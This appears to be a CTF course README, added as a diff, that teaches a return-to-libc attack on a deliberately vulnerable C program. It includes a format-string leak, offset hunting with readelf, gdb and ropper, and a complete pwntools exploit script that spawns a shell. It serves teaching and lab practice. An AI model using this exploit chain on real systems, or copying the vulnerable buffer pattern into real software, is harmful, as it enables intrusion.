|
| 1 | +<h1 align="center">PWN 302</h1> |
| 2 | + <p align="center"> |
| 3 | + Return to Libc |
| 4 | + </p> |
| 5 | + |
| 6 | +### Table of contents |
| 7 | + |
| 8 | +- [Introduction](#introduction) |
| 9 | +- [Overwriting the Return Address](#overwriting-the-return-address) |
| 10 | +- [Offset Consistency](#offset-consistency) |
| 11 | +- [Ret2libc Steps](#ret2libc-steps) |
| 12 | +- [Finding Libc Base Address](#finding-libc-base-address) |
| 13 | +- [Finding Other Addresses](#finding-other-addresses) |
| 14 | +- [Putting It All Together](#putting-it-all-together) |
| 15 | +- [Practice](#practice) |
| 16 | +- [More Resources](#more-resources) |
| 17 | +- [Creators](#creators) |
| 18 | + |
| 19 | +## Introduction |
| 20 | + |
| 21 | +Whenever you execute a C program on Linux, the standard C library, libc, is almost always loaded alongside the program in memory. The return-to-libc attack is a technique where the attacker overwrites `RIP` with the address of a function that is located within the standard C library in order to bypass DEP. This requires the attacker to either know the virtual address where libc was loaded in memory beforehand or to leak the base address using something like a format string vulnerability. Once the attacker knows the base address of the standard C library, the attacker can then calculate the address of the function he/she needs to jump to. |
| 22 | + |
| 23 | +## Overwriting the Return Address |
| 24 | + |
| 25 | +Here is the code for the program that will be exploited today: |
| 26 | +```c |
| 27 | +#include <stdio.h> |
| 28 | +#include <stdlib.h> |
| 29 | +#include <string.h> |
| 30 | + |
| 31 | +int main(int argc, char **argv) { |
| 32 | + char buf[100]; |
| 33 | + |
| 34 | + while(strncmp("quit", buf, 4) != 0) { |
| 35 | + fgets(buf, 1000, stdin); |
| 36 | + printf(buf); |
| 37 | + } |
| 38 | + |
| 39 | + return 0; |
| 40 | +} |
| 41 | +``` |
| 42 | +
|
| 43 | +Here is a sample of what the program looks like when executed: |
| 44 | +```sh |
| 45 | +$ ./vuln |
| 46 | +The program simply |
| 47 | +The program simply |
| 48 | +Prints out |
| 49 | +Prints out |
| 50 | +Whatever text you give it |
| 51 | +Whatever text you give it |
| 52 | +Until you say |
| 53 | +Until you say |
| 54 | +quit |
| 55 | +quit |
| 56 | +
|
| 57 | +$ |
| 58 | +``` |
| 59 | + |
| 60 | +If the first four characters of the input are equal to "quit," then it is possible to overwrite the return address after 120 bytes have been sent to the program. |
| 61 | + |
| 62 | +```sh |
| 63 | +$ python3 -c "import sys; sys.stdout.buffer.write(b'quit' + b'A'*116 + b'BBBBBBBB')" |
| 64 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 65 | +$ gdb vuln |
| 66 | +GNU gdb (Debian 10.1-1.4) 10.1 |
| 67 | +Copyright (C) 2020 Free Software Foundation, Inc. |
| 68 | +License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> |
| 69 | +This is free software: you are free to change and redistribute it. |
| 70 | +There is NO WARRANTY, to the extent permitted by law. |
| 71 | +Type "show copying" and "show warranty" for details. |
| 72 | +This GDB was configured as "x86_64-linux-gnu". |
| 73 | +Type "show configuration" for configuration details. |
| 74 | +For bug reporting instructions, please see: |
| 75 | +<https://www.gnu.org/software/gdb/bugs/>. |
| 76 | +Find the GDB manual and other documentation resources online at: |
| 77 | + <http://www.gnu.org/software/gdb/documentation/>. |
| 78 | + |
| 79 | +For help, type "help". |
| 80 | +Type "apropos word" to search for commands related to "word"... |
| 81 | +GEF for linux ready, type `gef' to start, `gef config' to configure |
| 82 | +78 commands loaded for GDB 10.1 using Python engine 3.9 |
| 83 | +[*] 2 commands could not be loaded, run `gef missing` to know why. |
| 84 | +Reading symbols from vuln... |
| 85 | +(No debugging symbols found in vuln) |
| 86 | +gef➤ r |
| 87 | +Starting program: /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 88 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 89 | +quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB |
| 90 | +
|
| 91 | +Program received signal SIGSEGV, Segmentation fault. |
| 92 | +0x00005555555551b1 in main () |
| 93 | +[ Legend: Modified register | Code | Heap | Stack | String ] |
| 94 | +────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── |
| 95 | +$rax : 0x0 |
| 96 | +$rbx : 0x0 |
| 97 | +$rcx : 0xfffffff0 |
| 98 | +$rdx : 0x4 |
| 99 | +$rsp : 0x00007fffffffdfc8 → "BBBBBBBB\n" |
| 100 | +$rbp : 0x4141414141414141 ("AAAAAAAA"?) |
| 101 | +$rsi : 0x00007fffffffdf50 → "quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" |
| 102 | +$rdi : 0x0000555555556004 → 0x0000000074697571 ("quit"?) |
| 103 | +$rip : 0x00005555555551b1 → <main+92> ret |
| 104 | +$r8 : 0x00005555555596b0 → "quitAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" |
| 105 | +$r9 : 0x81 |
| 106 | +$r10 : 0x6e |
| 107 | +$r11 : 0x4 |
| 108 | +$r12 : 0x0000555555555070 → <_start+0> xor ebp, ebp |
| 109 | +$r13 : 0x0 |
| 110 | +$r14 : 0x0 |
| 111 | +$r15 : 0x0 |
| 112 | +$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification] |
| 113 | +$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 |
| 114 | +────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── |
| 115 | +0x00007fffffffdfc8│+0x0000: "BBBBBBBB\n" ← $rsp |
| 116 | +0x00007fffffffdfd0│+0x0008: 0x00007fffffff000a → 0x0000000000000000 |
| 117 | +0x00007fffffffdfd8│+0x0010: 0x0000000100000000 |
| 118 | +0x00007fffffffdfe0│+0x0018: 0x0000555555555155 → <main+0> push rbp |
| 119 | +0x00007fffffffdfe8│+0x0020: 0x00007ffff7e157cf → <init_cacheinfo+287> mov rbp, rax |
| 120 | +0x00007fffffffdff0│+0x0028: 0x0000000000000000 |
| 121 | +0x00007fffffffdff8│+0x0030: 0xda40a1a22c058212 |
| 122 | +0x00007fffffffe000│+0x0038: 0x0000555555555070 → <_start+0> xor ebp, ebp |
| 123 | +──────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── |
| 124 | + 0x5555555551a9 <main+84> jne 0x555555555166 <main+17> |
| 125 | + 0x5555555551ab <main+86> mov eax, 0x0 |
| 126 | + 0x5555555551b0 <main+91> leave |
| 127 | + → 0x5555555551b1 <main+92> ret |
| 128 | +[!] Cannot disassemble from $PC |
| 129 | +──────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── |
| 130 | +[#0] Id 1, Name: "vuln", stopped 0x5555555551b1 in main (), reason: SIGSEGV |
| 131 | +────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── |
| 132 | +[#0] 0x5555555551b1 → main() |
| 133 | +───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── |
| 134 | +gef➤ |
| 135 | +``` |
| 136 | +
|
| 137 | +## Offset Consistency |
| 138 | +
|
| 139 | +One interesting thing to note about ASLR is that while it does modify the locations of certain variables and functions, it usually does not modify the offsets of these variables and functions. For example, suppose that while debugging a running process, we hit a breakpoint and notice that there is some stack variable `x` at location `0x7ffffffff000` and another stack variable `y` at location `0x7ffffffff100`. Assuming ASLR is enabled, if we were to rerun the process a second time and see that `x` is now stored at location `0x7ffffffff510` when we hit the same breakpoint, then we would expect that `y` would be located at `0x7ffffffff610`. In other words, even though the addresses of each variable get modified, `x` and `y` continue to have an offset of exactly `0x100` bytes away from each other in each instance of the program. |
| 140 | +
|
| 141 | +The reason that this occurs is because it would take far too long for ASLR to randomize the locations of each and every variable in a program. Instead, ASLR simply randomizes the base addresses of the memory mappings, which causes the distances between two variables in the same memory mapping to rarely change. |
| 142 | +
|
| 143 | +Of course, there are exceptions to this rule of rarely changing offsets. If `x` was a heap variable while `y` was a stack variable, then there would be a far greater chance for the offsets to change since the heap and the stack are loaded into two very separate memory mappings. Furthermore, if we were to use two different breakpoints at two different locations of the program, then there would be a greater chance for one of the variables to have been deleted or moved somewhere else due to the constantly changing nature of the stack. However, for the purposes of doing a ret2libc attack, this is a perfect scenario because if we know the address where the libc library is loaded, then we can add the value of an unchanging offset to that address to obtain the address of a function within the libc library. |
| 144 | +
|
| 145 | +## Ret2libc Steps |
| 146 | +
|
| 147 | +There are four main steps to completing a basic return-to-libc attack: |
| 148 | +1. Obtain an address that points to something within the libc library using something like a format string vulnerability (only required if ASLR is enabled). |
| 149 | +2. Use the address from step 1 to calculate the base address of the libc library. |
| 150 | +3. Calculate the addresses of the libc functions you would like to jump to using the base address of the libc library. |
| 151 | +4. Use a different vulnerability, such as a buffer overflow, to overwrite the return address with the libc function that you would like to jump to (can also use ROP chains to jump to multiple libc functions). |
| 152 | +
|
| 153 | +## Finding Libc Base Address |
| 154 | +
|
| 155 | +Our first step is to use a format string vulnerability to leak an address from the stack that points to a function/variable in the libc library. In order to see the entire memory mapping from a specific running instance of the program, we can run the program in GDB using the `r` command, hit Ctrl-C while the program is running, and make use of the `vmmap` command. Note that these addresses can change if you rerun the program. |
| 156 | +
|
| 157 | +```sh |
| 158 | +gef➤ vmmap |
| 159 | +[ Legend: Code | Heap | Stack ] |
| 160 | +Start End Offset Perm Path |
| 161 | +0x0000555555554000 0x0000555555555000 0x0000000000000000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 162 | +0x0000555555555000 0x0000555555556000 0x0000000000001000 r-x /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 163 | +0x0000555555556000 0x0000555555557000 0x0000000000002000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 164 | +0x0000555555557000 0x0000555555558000 0x0000000000002000 r-- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 165 | +0x0000555555558000 0x0000555555559000 0x0000000000003000 rw- /home/nihaal/Desktop/ctf-courses/Pwn/PWN 303/vuln |
| 166 | +0x0000555555559000 0x000055555557a000 0x0000000000000000 rw- [heap] |
| 167 | +0x00007ffff7def000 0x00007ffff7e14000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 168 | +0x00007ffff7e14000 0x00007ffff7f5f000 0x0000000000025000 r-x /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 169 | +0x00007ffff7f5f000 0x00007ffff7fa9000 0x0000000000170000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 170 | +0x00007ffff7fa9000 0x00007ffff7faa000 0x00000000001ba000 --- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 171 | +0x00007ffff7faa000 0x00007ffff7fad000 0x00000000001ba000 r-- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 172 | +0x00007ffff7fad000 0x00007ffff7fb0000 0x00000000001bd000 rw- /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 173 | +0x00007ffff7fb0000 0x00007ffff7fb6000 0x0000000000000000 rw- |
| 174 | +0x00007ffff7fcc000 0x00007ffff7fd0000 0x0000000000000000 r-- [vvar] |
| 175 | +0x00007ffff7fd0000 0x00007ffff7fd2000 0x0000000000000000 r-x [vdso] |
| 176 | +0x00007ffff7fd2000 0x00007ffff7fd3000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 177 | +0x00007ffff7fd3000 0x00007ffff7ff3000 0x0000000000001000 r-x /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 178 | +0x00007ffff7ff3000 0x00007ffff7ffb000 0x0000000000021000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 179 | +0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 180 | +0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /usr/lib/x86_64-linux-gnu/ld-2.31.so |
| 181 | +0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- |
| 182 | +0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] |
| 183 | +``` |
| 184 | +
|
| 185 | +In this instance of the program, the base of libc is at `0x7ffff7def000`, and the end of libc is at `0x00007ffff7fb0000`. If we exploit the format string vulnerability, we can see that the fifth pointer printed out from the stack points to an address that is within the libc library, so it will be the address that we use. |
| 186 | +
|
| 187 | +```sh |
| 188 | +gef➤ c |
| 189 | +Continuing. |
| 190 | +%p.%p.%p.%p.%p.%p. |
| 191 | +0x5555555592a1.(nil).0x5555555592b3.0x7fffffffdf50.0x7ffff7fadbe0.0x7fffffffe0b8. |
| 192 | +``` |
| 193 | +
|
| 194 | +If we subtract the base of libc from the fifth pointer, we get `0x7ffff7fadbe0 - 0x7ffff7def000 = 0x1bebe0`. In other words, if we subtract an offset of `0x1bebe0` from the value of the fifth pointer, then we can obtain the address of the base of libc. We can use this information to start creating an exploit script with pwntools. |
| 195 | +
|
| 196 | +```python |
| 197 | +#!/usr/bin/env python3 |
| 198 | +from pwn import * |
| 199 | +
|
| 200 | +# Open up the process |
| 201 | +p = process("./vuln", stdin=PTY) |
| 202 | +
|
| 203 | +# Leak a libc address |
| 204 | +p.sendline("%5$p") |
| 205 | +libc_base = int(p.recvline(), 16) - 0x1bebe0 |
| 206 | +``` |
| 207 | +
|
| 208 | +## Finding Other Addresses |
| 209 | +
|
| 210 | +Our next step is to obtain the address of `system()`, which is located in the libc library. In most Linux systems, libc is stored in a file called `/usr/lib/x86_64-linux-gnu/libc-2.31.so`, so we can use the following command to obtain the offset of `system()` from the base of libc. |
| 211 | +
|
| 212 | +```sh |
| 213 | +$ readelf -s /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep system |
| 214 | + 1430: 0000000000048df0 45 FUNC WEAK DEFAULT 14 system@@GLIBC_2.2.5 |
| 215 | +``` |
| 216 | +
|
| 217 | +The offset is `0x48df0`, meaning that if we add `0x48df0` to the `libc_base` variable we created in the Python script earlier, we should get the address of `system()`. |
| 218 | +
|
| 219 | +Since our goal is to call `system("/bin/sh")`, we'll also need to have a pointer to the string `/bin/sh`. Because libc uses this string in its code, this string is also located within the libc library, and we can use GDB to look for it. |
| 220 | +
|
| 221 | +```sh |
| 222 | +gef➤ find 0x00007ffff7def000,0x00007ffff7fb0000,"/bin/sh" |
| 223 | +0x7ffff7f79156 |
| 224 | +1 pattern found. |
| 225 | +gef➤ x/s 0x7ffff7f79156 |
| 226 | +0x7ffff7f79156: "/bin/sh" |
| 227 | +``` |
| 228 | +
|
| 229 | +Note that the parameters for the above `find` command are the beginning and end of the libc memory mapping for that instance. The command gave us an address of `0x7ffff7f79156`, which has an offset of `0x7ffff7f79156 - 0x7ffff7def000 = 0x18a156`. |
| 230 | +
|
| 231 | +We'll also need to have access to a `POP RDI` ROP gadget, which will allow us to store a pointer to the `/bin/sh` string into `RDI`. We can use the command shown below to obtain a `POP RDI` gadget (entire output not shown to save space). |
| 232 | +
|
| 233 | +```sh |
| 234 | +$ ropper --file /usr/lib/x86_64-linux-gnu/libc-2.31.so --search "pop rdi" |
| 235 | +[INFO] Load gadgets from cache |
| 236 | +[LOAD] loading... 100% |
| 237 | +[LOAD] removing double gadgets... 100% |
| 238 | +[INFO] Searching for gadgets: pop rdi |
| 239 | +
|
| 240 | +[INFO] File: /usr/lib/x86_64-linux-gnu/libc-2.31.so |
| 241 | +
|
| 242 | +[...] |
| 243 | +
|
| 244 | +0x0000000000026796: pop rdi; ret; |
| 245 | +0x000000000008f2d4: pop rdi; stc; jmp qword ptr [rsi + 0xf]; |
| 246 | +``` |
| 247 | +
|
| 248 | +The gadget at offset `0x26796` seems suitable for our purposes. |
| 249 | +
|
| 250 | +The last offset we need to obtain is the address of the `exit()` function, which will allow us to cleanly exit the program once we're done using our shell. We can find this address the same way we found the address of `system()`. |
| 251 | +
|
| 252 | +```sh |
| 253 | +$ readelf -s /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep exit |
| 254 | + 135: 000000000003e600 26 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.2.5 |
| 255 | + 552: 00000000000cb610 72 FUNC GLOBAL DEFAULT 14 _exit@@GLIBC_2.2.5 |
| 256 | + 609: 0000000000130bb0 37 FUNC GLOBAL DEFAULT 14 svc_exit@@GLIBC_2.2.5 |
| 257 | + 643: 0000000000138360 23 FUNC GLOBAL DEFAULT 14 quick_exit@GLIBC_2.10 |
| 258 | + 2217: 000000000003e620 276 FUNC WEAK DEFAULT 14 on_exit@@GLIBC_2.2.5 |
| 259 | +``` |
| 260 | +
|
| 261 | +We'll be using the first offset, `0x3e600`, and we'll ignore the other functions. |
| 262 | +
|
| 263 | +## Putting It All Together |
| 264 | +
|
| 265 | +Using the information we gathered in the previous section, we can generate the following exploit script: |
| 266 | +```python |
| 267 | +#!/usr/bin/env python3 |
| 268 | +from pwn import * |
| 269 | +
|
| 270 | +# Open up the process |
| 271 | +p = process("./vuln", stdin=PTY) |
| 272 | +
|
| 273 | +# Leak a libc address |
| 274 | +p.sendline("%5$p") |
| 275 | +libc_base = int(p.recvline(), 16) - 0x1bebe0 |
| 276 | +
|
| 277 | +# Calculate other addresses |
| 278 | +system = p64(libc_base + 0x48df0) |
| 279 | +bin_sh = p64(libc_base + 0x18a156) |
| 280 | +pop_rdi = p64(libc_base + 0x26796) |
| 281 | +exit = p64(libc_base + 0x3e600) |
| 282 | +
|
| 283 | +# Create the payload |
| 284 | +payload = b'quit' |
| 285 | +payload += b'A'*116 |
| 286 | +payload += pop_rdi |
| 287 | +payload += bin_sh |
| 288 | +payload += system |
| 289 | +payload += exit |
| 290 | +
|
| 291 | +# Trigger the buffer overflow |
| 292 | +p.sendline(payload) |
| 293 | +p.interactive() |
| 294 | +``` |
| 295 | +
|
| 296 | +First, we use the format string vulnerability to leak an address that allows us to calculate the base of libc. Next, we add various offsets to this base value in order to obtain the addresses that we need to use in our exploit. Once that is done, we generate a ROP chain that does the following: |
| 297 | +1. Uses the string `quit` to ensure that the program breaks out of the loop and hits a `RET` instruction at some point. |
| 298 | +2. Sends 116 useless bytes of A's to the process in order to get to the return address. |
| 299 | +3. Overwrites the return address with the address of the `POP RDI` gadget. |
| 300 | +4. Sets the value of `RDI` to the address of `/bin/sh`. |
| 301 | +5. Overwrites the return address again with the address of `system()`. |
| 302 | +6. Overwrites the return address one last time with the address of `exit()`. |
| 303 | +
|
| 304 | +When we run this script, we get a working shell. |
| 305 | +
|
| 306 | +```sh |
| 307 | +$ ./exploit.py |
| 308 | +[+] Starting local process './vuln': pid 2734 |
| 309 | +[*] Switching to interactive mode |
| 310 | +$ ls |
| 311 | +exploit.py README.md vuln vuln.c |
| 312 | +$ whoami |
| 313 | +nihaal |
| 314 | +$ |
| 315 | +``` |
| 316 | +
|
| 317 | +## Practice |
| 318 | +
|
| 319 | +The best way to practice creating ROP chains is to go through the challenges in [ROP Emporium](https://ropemporium.com/). These challenges will help you get better at return-oriented programming, and they'll help you understand how to get though common challenges when dealing with ROP chains. |
| 320 | +
|
| 321 | +## More Resources: |
| 322 | +- [NX bit](https://en.wikipedia.org/wiki/NX_bit) |
| 323 | +- [Symbol Table & Global Offset Table](https://www.codeproject.com/articles/1032231/what-is-the-symbol-table-and-what-is-the-global-of) |
| 324 | +- [ROP Emporium](https://ropemporium.com/) |
| 325 | +- [Nightmare's ROP Writeups](https://guyinatuxedo.github.io/rop.html) |
| 326 | +
|
| 327 | +## Creators |
| 328 | +
|
| 329 | +**Nihaal Prasad** |
| 330 | +
|
| 331 | +Enjoy :metal: |
0 commit comments